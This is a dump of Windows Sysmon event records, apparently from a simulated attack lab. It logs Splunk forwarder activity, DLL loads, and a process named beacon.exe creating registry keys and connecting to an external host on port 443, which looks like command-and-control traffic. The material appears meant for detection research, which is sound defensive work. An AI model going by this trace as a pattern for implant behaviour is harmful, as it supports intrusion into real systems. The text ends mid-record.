12:19:01.271{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6466D5B07533488B8D345645A2876280,SHA256=EF5E965513957316E7AC3ED4AF4C51E755D37C912BBB836986D77AFA224ACB94falsetrue 23542300x800000000000000021219885Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:02.548{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2D906C311D5F7ED183034ED211F70E2,SHA256=6EB1032E89B83F91B5AE4B11C2C150E48907B620B01821A48E6466F1499EDD34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000021219884Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:49.455{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64344-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 12241200x800000000000000057350174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:02.581{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057350173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:02.581{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057350172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:02.282{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:02.282{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38D5CE7FB42B1AE047FC089E1FD93FE,SHA256=98B38ACDEF0C1B9B19B64899EAF92E27AAF49E49BBD3990840411424EA50E4C5falsetrue 23542300x800000000000000021219883Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:02.064{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9180EA0D1063425D65F44FEA77D1126,SHA256=C20023AE80069FC7A873B9B223794184346A2277857B37142D327515E88C4177,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219882Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:02.064{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB85FD7B5AD337FFA40282CE0480ED08,SHA256=825532643C338CA4CD0463B610A61D55BF15F830E8F264B203C606CBFB9D69A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219886Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:03.564{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=033D54E9F60CDC5A4C7140AD7F285C62,SHA256=286039C28F5D277AFFB306798C845284071D230C05894BDBD5D5AA22880B2922,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000057350180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:03.381{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x800000000000000057350179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:03.381{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkrBinary Data 11241100x800000000000000057350178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:03.297{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:03.297{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42A716ABDC0671F07EF699D2728A0EF0,SHA256=1E29423EEE56811CCEDC3A9116EBDF0C8DDAD2D5DB694F472E89B31421905CEBfalsetrue 11241100x800000000000000057350176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:03.234{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:03.234{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=917530C185692E6906C978BC25215A53,SHA256=13281A438D473EC50B89CD0E9EF4DCD62ACB22B4D80B531594702ECF19C299F1falsetrue 23542300x800000000000000021219887Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:04.580{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B90AFF86713CB5713A8EE25ACB7ECA0,SHA256=C9DC7FC27884F382AF2B2980BF7658A91300A02A8F912BBB2699AF1645532ECA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:04.303{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:04.303{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=185B2FC687E9DA68065622932C1777BF,SHA256=9E002753026BDCE9F97E2675D33B64A72307802C2DD8E00060D77F02EA4E1432falsetrue 354300x800000000000000057350182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:34.936{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54574-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 354300x800000000000000057350181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:34.571{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54573-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219888Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:05.611{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBEBD5DAA3AD911AB0327F34082FBA0C,SHA256=DE90B0D22C52F2B5A4CD868F33F1C9463E10513B3FF3B474FD30AB4211481A79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350186Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:05.305{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:05.305{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=490EB4304355ED7E6987844B60D230FE,SHA256=2765AA762F73B5AC6473E8FB661137C862C652666A827BA4D3CCC5D30E85AE0Cfalsetrue 23542300x800000000000000021219889Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:06.627{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D44745F1B816C4F06B61BCE98FA11D1E,SHA256=7A556A5A29F57F9C313E049243A33D4A0B96D837E730B1A5BD159B39B06F3480,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350190Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:06.323{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350189Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:06.323{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69FE8859D4E9F4685E502E16279BEFD1,SHA256=CAE5766D7E4A0BEDE0317B5BE01528186E4DC98DF84BCA3B9ECB5FF3164F8CD7falsetrue 12241200x800000000000000057350188Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:06.157{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057350187Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:06.157{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 23542300x800000000000000021219894Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:07.644{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1385BF568F0DAF5F2DB41AAC911A22EF,SHA256=0D658AE54D9703E0EB481B9541CEC926222527437A1E604E6488BF047CA17081,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219893Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:07.644{AD5E2759-5433-6143-1200-00000000F101}292NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F99C9E97332EC06CA5CF01068F738124,SHA256=9DD0C5A734E3C8A4F215EB8CCC93F168E5004BCF673278ECBB750A5928C03AE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057350245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.889{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057350244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057350243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057350242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057350241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057350240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057350239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057350238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057350237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057350236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.874{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057350235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057350234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057350233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057350232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057350231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057350230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057350229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057350228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057350227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057350226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057350225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057350224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057350223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057350222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057350221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057350220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program 